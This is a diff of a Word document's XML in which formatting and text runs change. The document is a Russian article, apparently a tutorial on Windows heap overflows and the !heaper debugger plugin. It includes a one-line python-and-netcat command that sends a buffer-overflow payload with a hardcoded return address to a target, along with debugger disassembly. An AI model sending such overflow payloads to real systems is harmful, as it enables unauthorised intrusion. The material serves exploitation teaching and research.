+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>python -c "\x41" * 1024 + "\x42" * 8 + "\x20\xf0\xfd\x7f" + "\x18\x07\x49" | nc -v &lt;target&gt; &lt;ip&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Разумеется NULL байт будет добавлен в конце строки.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>00401000 &gt; $ B8 DE55F777    MOV EAX,ntdll.RtlEnterCriticalSection</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:t>Требования и ограничения:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>00401005   . B9 1CF0FD7F    MOV ECX,7FFDF01C</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:val="clear" w:fill="EEEEEE"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
-        </w:rPr>
-        <w:t>0040100A   . 83C1 04        ADD ECX,4</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:val="clear" w:fill="EEEEEE"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
-        </w:rPr>
-        <w:t>0040100D   . 8901           MOV DWORD PTR DS:[ECX],EAX</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">Если </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">мы </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>в следующий раз захотим эксплуатировать приложение одной командой, она будет выглядеть так (предполагается, что мы передаём данные по сокету):</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:val="clear" w:fill="EEEEEE"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>python -c "\x41" * 1024 + "\x42" * 8 + "\x20\xf0\xfd\x7f" + "\x18\x07\x49" | nc -v &lt;target&gt; &lt;ip&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Разумеется NULL байт будет добавлен в конце строки.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Требования и ограничения:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
       </w:r>
     </w:p>
     <w:p>
@@ -3375,47 +3514,7 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>В настоящий момент, пла</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>гин</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve"> не использует эвристические проверки, однако они появятся в ближайшем будущем. Пока он ли</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>шь</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve"> проверяет возможность перезаписи указателей flink/blink, а также было ли перезаписано поле заголовк</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">а, содержащее </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>размер чанк</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>а</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>. В течение ближайших месяцев появит</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>с</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>я поддержка Windows 7. Пока я провожу анализ возможных эксплуатаций и требуемых для них условий.</w:t>
+        <w:t>В настоящий момент, плагин не использует эвристические проверки, однако они появятся в ближайшем будущем. Пока он лишь проверяет возможность перезаписи указателей flink/blink, а также было ли перезаписано поле заголовка, содержащее размер чанка. В течение ближайших месяцев появится поддержка Windows 7. Пока я провожу анализ возможных эксплуатаций и требуемых для них условий.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3462,7 +3561,7 @@
       <w:r>
         <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="16">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="13">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:posOffset>527685</wp:posOffset>
@@ -3517,11 +3616,7 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t xml:space="preserve">Я уже отмечал, что </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">не так то просто </w:t>
+        <w:t xml:space="preserve">Я уже отмечал, что не так то просто </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3536,15 +3631,7 @@
       </w:r>
       <w:r>
         <w:rPr/>
-        <w:t>указател</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>ь</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>, который можно будет перезаписать. Более того, вам нужно будет убедиться, что найденный указатель будет вызван после нашего переполнения. !heaper поможет нам решить эту проблему.</w:t>
+        <w:t>указатель, который можно будет перезаписать. Более того, вам нужно будет убедиться, что найденный указатель будет вызван после нашего переполнения. !heaper поможет нам решить эту проблему.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3637,7 +3724,7 @@
       <w:r>
         <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="17">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="14">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:align>center</wp:align>
@@ -3730,7 +3817,7 @@
       <w:r>
         <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="18">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="15">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:align>center</wp:align>
@@ -3823,15 +3910,7 @@
       </w:r>
       <w:r>
         <w:rPr/>
-        <w:t>и идеями о том, что бы вы хотел</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>и</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve"> добавить. Примеры некоторых предложений:</w:t>
+        <w:t>и идеями о том, что бы вы хотели добавить. Примеры некоторых предложений:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4499,6 +4578,7 @@
       <w:rPr>
         <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
         <w:kern w:val="2"/>
+        <w:sz w:val="20"/>
         <w:szCs w:val="24"/>
         <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
       </w:rPr>
